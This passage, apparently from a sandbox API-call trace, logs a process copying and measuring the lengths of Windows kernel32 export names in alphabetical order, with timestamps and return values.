lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0080.030] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0080.030] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0080.030] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0080.030] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0080.030] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0080.030] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0080.030] lstrlenA (lpString="BEEP") returned 4 [0080.030] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0080.030] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0080.030] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0080.030] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0080.030] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0080.030] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0080.030] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0080.030] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0080.030] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0080.030] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0080.031] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0080.031] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0080.031] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0080.031] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0080.031] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0080.031] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0080.031] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0080.031] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0080.031] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0080.031] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0080.031] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0080.031] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0080.031] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0080.031] lstrlenA (lpString="CANCELIO") returned 8 [0080.031] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0080.031] lstrlenA (lpString="CANCELIOEX") returned 10 [0080.031] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0080.031] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0080.031] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0080.031] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0080.031] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0080.031] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0080.031] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0080.031] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0080.031] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0080.031] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0080.031] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0080.031] lstrlenA (lpString="CHECKELEVATION") returned 14 [0080.031] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0080.031] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0080.031] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0080.031] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0080.031] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0080.031] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0080.031] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0080.031] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0080.031] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0080.032] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0080.032] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0080.032] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0080.032] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0080.032] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0080.032] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0080.032] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0080.032] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0080.032] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0080.032] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0080.032] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0080.032] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0080.032] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0080.032] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0080.032] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0080.032] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0080.032] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0080.032] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0080.032] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0080.032] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0080.032] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0080.032] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0080.032] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0080.032] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0080.032] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0080.032] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0080.032] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0080.032] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0080.032] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0080.032] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0080.032] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0080.032] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0080.032] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0080.032] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0080.032] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0080.033] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0080.033] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0080.033] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0080.033] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0080.033] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0080.033] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0080.033] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0080.033] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0080.033] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0080.033] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0080.033] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0080.033] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0080.033] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0080.033] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0080.033] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0080.033] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0080.033] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0080.033] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0080.033] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0080.033] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0080.033] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0080.033] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0080.033] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0080.033] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0080.033] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0080.033] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0080.033] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0080.033] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0080.033] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0080.033] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0080.033] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0080.033] lstrlenA (lpString="COPYCONTEXT") returned 11 [0080.033] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0080.033] lstrlenA (lpString="COPYFILEA") returned 9 [0080.033] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0080.033] lstrlenA (lpString="COPYFILEEXA") returned 11 [0080.033] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0080.033] lstrlenA (lpString="COPYFILEEXW") returned 11 [0080.034] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0080.034] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0080.034] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0080.034] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0080.034] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0080.034] lstrlenA (lpString="COPYFILEW") returned 9 [0080.034] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0080.034] lstrlenA (lpString="COPYLZFILE") returned 10 [0080.034] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0080.034] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0080.034] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0080.034] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0080.034] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0080.034] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0080.034] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0080.034] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0080.034] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0080.034] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0080.034] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0080.034] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0080.034] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0080.034] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0080.034] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0080.034] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0080.034] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0080.034] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0080.034] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0080.034] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0080.034] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0080.034] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0080.034] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0080.034] lstrlenA (lpString="CREATEEVENTA") returned 12 [0080.034] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0080.034] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0080.034] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0080.034] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0080.034] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0080.035] lstrlenA (lpString="CREATEEVENTW") returned 12 [0080.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0080.035] lstrlenA (lpString="CREATEFIBER") returned 11 [0080.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0080.035] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0080.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0080.035] lstrlenA (lpString="CREATEFILEA") returned 11 [0080.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0080.035] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0080.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0080.035] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0080.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0080.035] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0080.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0080.035] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0080.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0080.035] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0080.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0080.035] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0080.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0080.035] lstrlenA (lpString="CREATEFILEW") returned 11 [0080.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0080.035] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0080.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0080.035] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0080.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0080.035] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0080.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0080.035] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0080.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0080.035] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0080.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0080.035] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0080.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0080.035] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0080.035] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0080.035] lstrlenA (lpString="CREATEJOBSET") returned 12 [0080.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0080.036] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0080.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0080.036] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0080.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0080.036] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0080.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0080.036] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0080.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0080.036] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0080.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0080.036] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0080.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0080.036] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0080.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0080.036] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0080.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0080.036] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0080.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0080.036] lstrlenA (lpString="CREATEPIPE") returned 10 [0080.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0080.036] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0080.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0080.036] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0080.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0080.036] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0080.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0080.036] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0080.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0080.036] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0080.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0080.036] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0080.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0080.036] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0080.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0080.036] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0080.036] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0080.036] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0080.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0080.037] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0080.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0080.037] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0080.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0080.037] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0080.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0080.037] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0080.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0080.037] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0080.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0080.037] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0080.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0080.037] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0080.037] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateSymbolicLinkTransactedW" | out: 